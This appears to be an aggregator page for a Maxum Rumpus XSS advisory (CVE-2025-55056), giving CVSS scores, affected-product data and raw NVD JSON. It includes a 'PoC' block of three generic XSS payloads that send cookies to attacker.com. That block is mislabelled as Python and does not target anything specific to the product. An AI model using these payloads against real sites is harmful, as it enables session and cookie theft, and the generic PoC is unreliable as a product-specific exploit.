Security Vulnerability Report
中文
CVE-2025-55056 CVSS 4.8 MEDIUM

CVE-2025-55056

Published: 2025-11-17 18:15:57
Last Modified: 2025-11-24 15:47:20

Description

Multiple CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting')

CVSS Details

CVSS Score
4.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:maxum:rumpus:9.0.12:*:*:*:*:*:*:* - VULNERABLE
未知版本(需根据具体产品确定)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-55056 XSS PoC --> <!-- 攻击者通过输入以下Payload注入恶意脚本 --> <script>alert('XSS');document.location='https://attacker.com/steal?cookie='+document.cookie</script> <!-- 绕过过滤的变形Payload --> <img src=x onerror="fetch('https://attacker.com/log?data='+btoa(document.cookie))"> <!-- SVG-based XSS --> <svg/onload=fetch('https://attacker.com/exfil?c='+document.cookie)>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-55056", "sourceIdentifier": "[email protected]", "published": "2025-11-17T18:15:57.223", "lastModified": "2025-11-24T15:47:20.383", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting')"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:maxum:rumpus:9.0.12:*:*:*:*:*:*:*", "matchCriteriaId": "BF506B06-DA9E-418B-82EE-C89FA9F485D4"}]}]}], "references": [{"url": "https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}